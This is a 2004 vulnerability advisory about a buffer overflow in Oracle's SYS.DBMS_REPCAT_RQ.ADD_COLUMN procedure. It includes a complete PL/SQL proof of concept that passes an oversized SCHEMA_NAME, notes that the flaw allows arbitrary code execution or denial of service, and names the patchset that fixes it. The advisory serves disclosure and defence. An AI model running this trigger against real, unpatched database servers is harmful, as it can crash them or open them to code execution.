|
#37 - Buffer overflow in procedure ADD_COLUMN of DBMS_REPCAT_RQ package
August 31, 2004
Credit: These vulnerabilities were researched and discovered by Esteban Martínez Fayó of Application Security, Inc.
Risk level: Low
Details:
When ADD_COLUMN procedure is called with a long string in the SCHEMA_NAME parameter a buffer overflow occurs.
To reproduce the overflow, execute the next PL/SQL:
DECLARE
P_SCHEMA_NAME VARCHAR2(32767);
P_OBJECT_NAME VARCHAR2(32767);
P_COLUMN_NAME VARCHAR2(32767);
P_DDL_TEXT CLOB;
P_COLUMN_GROUP_NAME VARCHAR2(32767);
P_NEW_GROUP VARCHAR2(32767);
P_RETRY BOOLEAN;
AAA VARCHAR2(32767);
BEGIN
AAA:='A';
AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA;
AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA;
AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA;
P_SCHEMA_NAME := AAA;
P_OBJECT_NAME := 'Y';
P_COLUMN_NAME := 'Y';
P_COLUMN_GROUP_NAME := 'Y';
P_NEW_GROUP := 'Y';
P_RETRY := FALSE;
SYS.DBMS_REPCAT_RQ.ADD_COLUMN(SCHEMA_NAME => P_SCHEMA_NAME, OBJECT_NAME => P_OBJECT_NAME, COLUMN_NAME => P_COLUMN_NAME, DDL_TEXT =>
P_DDL_TEXT, COLUMN_GROUP_NAME => P_COLUMN_GROUP_NAME, NEW_GROUP => P_NEW_GROUP, RETRY => P_RETRY);
END;
Analysis:
This vulnerability can be exploited by members of SYSDBA role and users granted execute permissions on DBMS_REPCAT_RQ package.
Exploitation of this vulnerability allows an attacker to execute arbitrary code. It can also be exploited to cause DOS (Denial of service) killing Oracle server process.
Vendor Fix:
Fixed in Patchset 4 (9.2.0.5). 10g Not vulnerable.
|
